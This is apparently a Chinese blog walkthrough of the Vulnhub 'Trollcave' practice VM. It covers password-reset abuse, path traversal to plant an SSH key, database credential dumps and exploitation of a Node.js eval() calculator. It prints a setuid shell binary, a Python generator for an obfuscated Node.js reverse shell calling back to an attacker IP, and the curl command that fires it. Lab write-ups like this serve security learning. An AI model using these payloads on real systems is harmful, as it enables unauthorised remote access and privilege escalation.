【Vulnhub】靶机TROLLCAVE

前言

• Vulnhub刷题简单记录

TROLLCAVE

描述

Trollcave是一个易受攻击的虚拟机，具有Vulnhub的传统和一般的信息安全兵棋推演。你从一个你一无所知的虚拟机开始——没有用户名，没有密码，只有你可以在网络上看到的。在这种情况下，您将看到一个包含大量用户的简单社区博客网站。从这个初始点开始，您枚举机器正在运行的服务和一般特征，并设计出通过查找和利用漏洞和错误配置来完全控制它的方法。

你的第一个目标是滥用机器上的服务来获得未经授权的 shell 访问。您的最终目标是读取root用户主目录中的文本文件root/flag.txt）。

此 VM 设计为整体且相当实用。我想模拟对真实网站的真实攻击，而不仅仅是呈现一个由不同元素组成的拼图框，并且我想避免更深奥的易受攻击的 VMisms，例如当您必须对发现端口的 MP3 进行信号处理时- 敲门顺序。当然，在现实和最有趣/具有挑战性的事物之间总是要权衡利弊，但我试图让挑战保持扎根。

因为这是您要下载、导入和启动的 VM，所以实现此目标的一种方法是挂载 VM 的硬盘。我没有加密磁盘或采取任何措施来防止这种情况发生，所以如果你想走那条路，继续吧。我也不会为完成这个 VM 提供奖品或任何东西，所以要知道这完全没有意义。

因为这是一个运行具有真实服务的真实操作系统的虚拟机，所以可能有一些方法可以达到root我不想要的。理想情况下，这应该是乐趣的一部分，但如果它们使盒子变得微不足道，我想了解并修复它们 - 在合理范围内。在此版本中，我已经安装了适用于 Ubuntu Server 16.04 LTS 的所有更新，但我不能也不会尝试针对未来出现的每个新 Linux 内核漏洞修补此 VM。所以有一个提示——你不必使用内核漏洞来根这个框。

你需要一个好的 HTTP 拦截代理——我推荐Burpsuite——以及一些网络工具，比如nmap和nc。您还需要一些虚拟化软件——VirtualBox对大多数人来说是最简单的，但 KVM 和 VMWare 也应该能够.ova在稍微摆弄之后导入文件。导入 VM 后，将其与攻击系统放在同一网络上（最好不要让其访问 Internet）并开始黑客攻击！

您可以在.ova此处获取文件 ( 929MB )（2018 年 3 月 19 日更新）。让我知道你的想法。

不适用于 VMware。更新日志 v1.1 - 19/03/2018 v1.2 - 21/03/2018

靶机的地址：https://www.vulnhub.com/entry/trollcave-12,230/

Trollcave开始

1、可以用两种方法确认靶场的存在，扫ip

netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

2、扫目标端口开发情况

nmap -sV -sC -A 192.168.1.108

3、访问主页，根据提示说有一个password_resets，我们扫一下目录情况

gobuster dir -u http://192.168.1.104/password_resets -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200

dirb http://192.168.1.104/password_resets

接着扫出任意重置密码了目录了
http://192.168.1.104/password_resets/new

4、通过改get参数，来改king的密码

http://192.168.1.104/password_resets/edit.aSp4X7kLnpkxOH4xu4Nyug?name=King

5、登陆上去之后有个文件上传，我们打开一下enable，然后再上传，因为是ruby语言写的，所以木马没用，我们只能靠提示的tails，猜测有tails用户，然后通过nmap确定有rsa加密登陆，所以用文件上传来覆盖/home/rails/.ssh/authorized_keys，最后登陆，下面展示命令

ssh-keygen -f rails  #伪造sha256
mv rails.pub authorized_keys #重命名
通过目录穿越，将其上传到../../../../../../home/rails/.ssh/authorized_keys
mv rails id_rsa-rails #重命名
ssh -i id_rsa-rails rails@192.168.1.104 #无密码连接

6、提权的方法，这个靶机中

1、首先，信息收集，在网站目录发现config中数据库的信息

production:
  adapter: postgresql
  encoding: unicode
  database: trollcave
  pool: 5
  host: localhost
  username: tc
  password: sowvillagedinnermoment

2、接着尝试用sqlite3读取数据库文件

sqlite> select * from private_messages
   ...> ;
1|password|
use it sparingly

uFrrK3dXzWeZQ7JtGgZk4FT

do NOT share it
|1|3|2017-09-29 14:03:24.494241|2017-09-29 14:03:24.494241
sqlite> .tables
admin_settings     comments           reports            user_files                                                                                                              
blogs              private_messages   schema_migrations  users                                                                                                                   
sqlite> select * from users;                                                                                                                                                     
1|King|king@trollcave.com|:)|$2a$10$tHX6EGkwuapTRY1/7R/meuVPLUT8Tkooh0M6WpQpGKOSSwuuc.7C.||5|0|||2017-09-29 14:03:23.339227|2017-09-29 14:03:23.339227|||                        
2|dave|david@32letters.com|nah lol|$2a$10$DpHp4ikbNnq/43uhbjWJcee9lTLDTTx2ndtSl99m81wDSvNBuztiS||4|0|||2017-09-29 14:03:23.414352|2017-09-29 14:03:23.414352|||                  
3|dragon|dragon@trollcave.com|Over fire and over stone / Over water and over bone / Shining out like jewels of light / On a sheet of purest night|$2a$10$XmozUYK/xikEb7CktLCer.LXwXYFDzISlCNGKGh8sxyqy7OunCdFS||4|0|||2017-09-29 14:03:23.484532|2017-09-29 14:03:23.484532|||                                                                                    
4|coderguy|coderguy@trollcave.com|;)|$2a$10$XVAiu4/71LV.2JA5e6UZr.BEIvSpAI0Wt8YqKU0FOdcKwcQIAppLO||4|0|||2017-09-29 14:03:23.550390|2017-09-29 14:03:23.550390|||                
5|cooldude89|kewldewdeightynine@zmail.com|i am the dankest|$2a$10$HR0yIsnfKaSG07Kge5Z7K.Ki7dthW3IqQ0PYd/ZS3rA.KFjWv92z.||3|0|||2017-09-29 14:03:23.616162|2017-09-29 14:03:23.616162|||                                                                                                                                                                           
6|Sir|sir@zmail.com|It's super secure|$2a$10$tYaFo0fGxFreOdFBy3ch5ej/UrznlUQBcM8l7il0Zx25ca6as/xza||3|0|||2017-09-29 14:03:23.682157|2017-09-29 14:03:23.682157|||               
7|Q|q@zmail.com|Your normal password|$2a$10$gTZ1kX5xHLp0JT78n.UMeeAd789/5h1p8Ox4L2e4rCIVPImb6vOfu||3|0|||2017-09-29 14:03:23.753882|2017-09-29 14:03:23.753882|||                
8|teflon|tf@zmail.com|swordfish|$2a$10$F5Ajt2HI.7xshVrHJqZy6.Iv2myLqDJwgyzBDogDe79WlDdIrsBDO||3|0|||2017-09-29 14:03:23.819291|2017-09-29 14:03:23.819291|||                     
9|TheDankMan|dope@dankmail.com|420|$2a$10$bbI2A71mL5pcCtY/mB4nIeQzxi4z6/c/K/0RpurZMMfBn4I7JGGlm||2|0|||2017-09-29 14:03:23.884605|2017-09-29 14:03:23.884605|||                  
10|artemus|artemus_12145@zmail.com|garden|$2a$10$x/L0IWKs29nrN9qOVisPzeIJIrBaZfCMXWJdco6DUtZlGMOAuWrmO||2|0|||2017-09-29 14:03:23.950848|2017-09-29 14:03:23.950848|||
11|MrPotatoHead|potatoe@zmail.com|you know...|$2a$10$AmuZ8ccJ4r3kaAc13ycjTezsAbvtF66lNkq2R7tXmLNWuf8U12sLG||2|0|||2017-09-29 14:03:24.016908|2017-09-29 14:03:24.016908|||
12|Ian|iane@zmail.com|a|$2a$10$InZ5.qJvFkgZX76xw8ZqGekxhwmvGCaRNBqU0rroOqG4RRuSZsXFK||2|0|||2017-09-29 14:03:24.082082|2017-09-29 14:03:24.082082|||
13|kev|kevin@zmail.com|mother's maiden name|$2a$10$D13SoP5GCHC6RkIBOQSXKuQf9E9h5Mo1evGZJa9p23xzUSkfugj7S||1|0|||2017-09-29 14:03:24.149092|2017-09-29 14:03:24.149092|||
14|notanother|notanother@zmail.com|(:|$2a$10$PYqCCOIop.NRMWm13ue26eEkc/ZR/7rDCOpiN5.9rkZ7/GSUcJ8rC||1|0|||2017-09-29 14:03:24.215992|2017-09-29 14:03:24.215992|||
15|anybodyhome|anybodyhome@zmail.com|no one is|$2a$10$Dc1Q8NufJ/oEZLeIxFWASOT4Kj4/WHzmTNUaD6U9omBtKapLJFKse||1|0|||2017-09-29 14:03:24.282237|2017-09-29 14:03:24.282237|||
16|onlyme|onlymememe@zmail.com|It is what it is|$2a$10$X4DKSco.clov.ro0pcN.nO1DYa3V/PRAQq6oOQCb/TW.MJyaHqSnW||1|0|||2017-09-29 14:03:24.348750|2017-09-29 14:03:24.348750|||
17|xer|xer@zmail.com|fave pronoun|$2a$10$rjjHGOYhobwzMPysTjd0k.OWH4x/FlnCtIv6VjPstLR3RWYOSHyQ6||1|0|||2017-09-29 14:03:24.414057|2017-09-29 14:03:24.414057|||

接着尝试连接5432的ptl数据库，因为kali无法访问，所以需要将端口转发出来

快键键 shift+波浪号（~）+C

3、就可以进入ssh模式，来进行端口转发，输入命令

ssh> -L 5432:localhost:5432

本地可以查看，是否成功

4、利用dbeaver这个软件来进行连接postgreSQL，密码就是我们刚刚收集的，并没有发现有用信息

5、用同样的方法，将8888端口转到本地访问一下，发现有一个calc的关键字，搜索一下calc看看

find / -iname calc 2>/dev/null

接着发现King目录下有一个calc.js脚本，发现其可以被命令执行

var http = require("http");
var url = require("url");
var sys = require('sys');
var exec = require('child_process').exec;

// Start server
function start(route)
{
	function onRequest(request, response)
	{
		var theurl = url.parse(request.url);
		var pathname = theurl.pathname;
		var query = theurl.query; 
		console.log("Request for " + pathname + query + " received.");
		route(pathname, request, query, response);
	}

http.createServer(onRequest).listen(8888, '127.0.0.1');
console.log("Server started");
}

// Route request
function route(pathname, request, query, response)
{
	console.log("About to route request for " + pathname);
	switch (pathname)
	{
		// security risk
		/*case "/ping":
			pingit(pathname, request, query, response);
			break;	*/

		case "/":
			home(pathname, request, query, response);
			break;	

		case "/calc":
			calc(pathname, request, query, response);
			break;	

		default:
			console.log("404");
			display_404(pathname, request, response);
			break;
	}
}

function home(pathname, request, query, response)
{
	response.end("<h1>The King's Calculator</h1>" +
			"<p>Enter your calculation below:</p>" +
			"<form action='/calc' method='get'>" +
				"<input type='text' name='sum' value='1+1'>" +
				"<input type='submit' value='Calculate!'>" +
			"</form>" +
			"<hr style='margin-top:50%'>" +
			"<small><i>Powered by node.js</i></small>"
			);
}

function calc(pathname, request, query, response)
{
	sum = query.split('=')[1];
	console.log(sum)
	response.writeHead(200, {"Content-Type": "text/plain"});

	response.end(eval(sum).toString());
}

function ping(pathname, request, query, response)
{
	ip = query.split('=')[1];
	console.log(ip)
	response.writeHead(200, {"Content-Type": "text/plain"});

	exec("ping -c4 " + ip, function(err, stdout, stderr) {
		response.end(stdout);
	});
}

function display_404(pathname, request, response)
{
	response.write("<h1>404 Not Found</h1>");
	response.end("I don't have that page, sorry!");
}

// Start the server and route the requests
start(route);

方法一

①在tmp目录中创建一个exp.c文件，写入获取king的shell的命令

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc,char *argv[])
{
	setreuid(1000,1000);	
	execve("/bin/bash",NULL,NULL);
}

gcc编译为exp

gcc exp.c -o exp

②在tmp目录中创建一个1.sh的执行文件，内容为

#!/bin/sh

cp /tmp/exp /tmp/exp-test
chmod 4777 /tmp/exp-test

利用burp抓包，在8888端口的calc中的sum直接执行命令，来执行1.sh使用king的权限

接着就获得了一个king的权限，并且任意用户都能使用的exp

③root的权限

方法二

①利用网上找到的一个payload生成命令执行

#!/usr/bin/python
import sys

if len(sys.argv) != 3:
    print "Usage: %s " % (sys.argv[0])
    sys.exit(0)

IP_ADDR = sys.argv[1]
PORT = sys.argv[2]

def charencode(string):
    """String.CharCode"""
    encoded = ''
    for char in string:
        encoded = encoded + "," + str(ord(char))
    return encoded[1:]

print "[+] LHOST = %s" % (IP_ADDR)
print "[+] LPORT = %s" % (PORT)
NODEJS_REV_SHELL = '''(function(){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh"; var net = require("net"), cp = require("child_process"), util = require("util"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(%s, "%s", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === "undefined") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on("error", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); })();1+1;''' % (PORT, IP_ADDR)
print "[+] Encoding"
PAYLOAD = charencode(NODEJS_REV_SHELL)
print "eval(String.fromCharCode(%s))" % (PAYLOAD)

②、接着利用这个脚本生成命令shell

┌──(root💀kali)-[~/BC/trollcave]
└─# python exp.py 192.168.1.102 1234                                                                          
[+] LHOST = 192.168.1.102
[+] LPORT = 1234
[+] Encoding
eval(String.fromCharCode(40,102,117,110,99,116,105,111,110,40,41,123,32,118,97,114,32,114,101,113,117,105,114,101,32,61,32,103,108,111,98,97,108,46,114,101,113,117,105,114,101,32,124,124,32,103,108,111,98,97,108,46,112,114,111,99,101,115,115,46,109,97,105,110,77,111,100,117,108,101,46,99,111,110,115,116,114,117,99,116,111,114,46,95,108,111,97,100,59,32,105,102,32,40,33,114,101,113,117,105,114,101,41,32,114,101,116,117,114,110,59,32,118,97,114,32,99,109,100,32,61,32,40,103,108,111,98,97,108,46,112,114,111,99,101,115,115,46,112,108,97,116,102,111,114,109,46,109,97,116,99,104,40,47,94,119,105,110,47,105,41,41,32,63,32,34,99,109,100,34,32,58,32,34,47,98,105,110,47,115,104,34,59,32,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,34,110,101,116,34,41,44,32,99,112,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,44,32,117,116,105,108,32,61,32,114,101,113,117,105,114,101,40,34,117,116,105,108,34,41,44,32,115,104,32,61,32,99,112,46,115,112,97,119,110,40,99,109,100,44,32,91,93,41,59,32,118,97,114,32,99,108,105,101,110,116,32,61,32,116,104,105,115,59,32,118,97,114,32,99,111,117,110,116,101,114,61,48,59,32,102,117,110,99,116,105,111,110,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,123,32,99,108,105,101,110,116,46,115,111,99,107,101,116,32,61,32,110,101,116,46,99,111,110,110,101,99,116,40,49,50,51,52,44,32,34,49,57,50,46,49,54,56,46,49,46,49,48,50,34,44,32,102,117,110,99,116,105,111,110,40,41,32,123,32,99,108,105,101,110,116,46,115,111,99,107,101,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,32,105,102,32,40,116,121,112,101,111,102,32,117,116,105,108,46,112,117,109,112,32,61,61,61,32,34,117,110,100,101,102,105,110,101,100,34,41,32,123,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,125,32,101,108,115,101,32,123,32,117,116,105,108,46,112,117,109,112,40,115,104,46,115,116,100,111,117,116,44,32,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,117,116,105,108,46,112,117,109,112,40,115,104,46,115,116,100,101,114,114,44,32,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,125,32,125,41,59,32,115,111,99,107,101,116,46,111,110,40,34,101,114,114,111,114,34,44,32,102,117,110,99,116,105,111,110,40,101,114,114,111,114,41,32,123,32,99,111,117,110,116,101,114,43,43,59,32,105,102,40,99,111,117,110,116,101,114,60,61,32,49,48,41,123,32,115,101,116,84,105,109,101,111,117,116,40,102,117,110,99,116,105,111,110,40,41,32,123,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,59,125,44,32,53,42,49,48,48,48,41,59,32,125,32,101,108,115,101,32,112,114,111,99,101,115,115,46,101,120,105,116,40,41,59,32,125,41,59,32,125,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,59,32,125,41,40,41,59,49,43,49,59))

③、接着在ssh刚连接的用户中执行下面命令，并且同时本机监听1234端口用nc

curl 'http://127.0.0.1:8888/calc?sum=eval(String.fromCharCode(40,102,117,110,99,116,105,111,110,40,41,123,32,118,97,114,32,114,101,113,117,105,114,101,32,61,32,103,108,111,98,97,108,46,114,101,113,117,105,114,101,32,124,124,32,103,108,111,98,97,108,46,112,114,111,99,101,115,115,46,109,97,105,110,77,111,100,117,108,101,46,99,111,110,115,116,114,117,99,116,111,114,46,95,108,111,97,100,59,32,105,102,32,40,33,114,101,113,117,105,114,101,41,32,114,101,116,117,114,110,59,32,118,97,114,32,99,109,100,32,61,32,40,103,108,111,98,97,108,46,112,114,111,99,101,115,115,46,112,108,97,116,102,111,114,109,46,109,97,116,99,104,40,47,94,119,105,110,47,105,41,41,32,63,32,34,99,109,100,34,32,58,32,34,47,98,105,110,47,115,104,34,59,32,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,34,110,101,116,34,41,44,32,99,112,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,44,32,117,116,105,108,32,61,32,114,101,113,117,105,114,101,40,34,117,116,105,108,34,41,44,32,115,104,32,61,32,99,112,46,115,112,97,119,110,40,99,109,100,44,32,91,93,41,59,32,118,97,114,32,99,108,105,101,110,116,32,61,32,116,104,105,115,59,32,118,97,114,32,99,111,117,110,116,101,114,61,48,59,32,102,117,110,99,116,105,111,110,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,123,32,99,108,105,101,110,116,46,115,111,99,107,101,116,32,61,32,110,101,116,46,99,111,110,110,101,99,116,40,49,50,51,52,44,32,34,49,57,50,46,49,54,56,46,49,51,54,46,49,51,52,34,44,32,102,117,110,99,116,105,111,110,40,41,32,123,32,99,108,105,101,110,116,46,115,111,99,107,101,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,32,105,102,32,40,116,121,112,101,111,102,32,117,116,105,108,46,112,117,109,112,32,61,61,61,32,34,117,110,100,101,102,105,110,101,100,34,41,32,123,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,125,32,101,108,115,101,32,123,32,117,116,105,108,46,112,117,109,112,40,115,104,46,115,116,100,111,117,116,44,32,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,117,116,105,108,46,112,117,109,112,40,115,104,46,115,116,100,101,114,114,44,32,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,125,32,125,41,59,32,115,111,99,107,101,116,46,111,110,40,34,101,114,114,111,114,34,44,32,102,117,110,99,116,105,111,110,40,101,114,114,111,114,41,32,123,32,99,111,117,110,116,101,114,43,43,59,32,105,102,40,99,111,117,110,116,101,114,60,61,32,49,48,41,123,32,115,101,116,84,105,109,101,111,117,116,40,102,117,110,99,116,105,111,110,40,41,32,123,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,59,125,44,32,53,42,49,48,48,48,41,59,32,125,32,101,108,115,101,32,112,114,111,99,101,115,115,46,101,120,105,116,40,41,59,32,125,41,59,32,125,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,59,32,125,41,40,41,59,49,43,49,59))'

就可以得到一个shell，并且可以用sudo bash提权无需密码

我的个人博客

孤桜懶契：http://gylq.gitee.io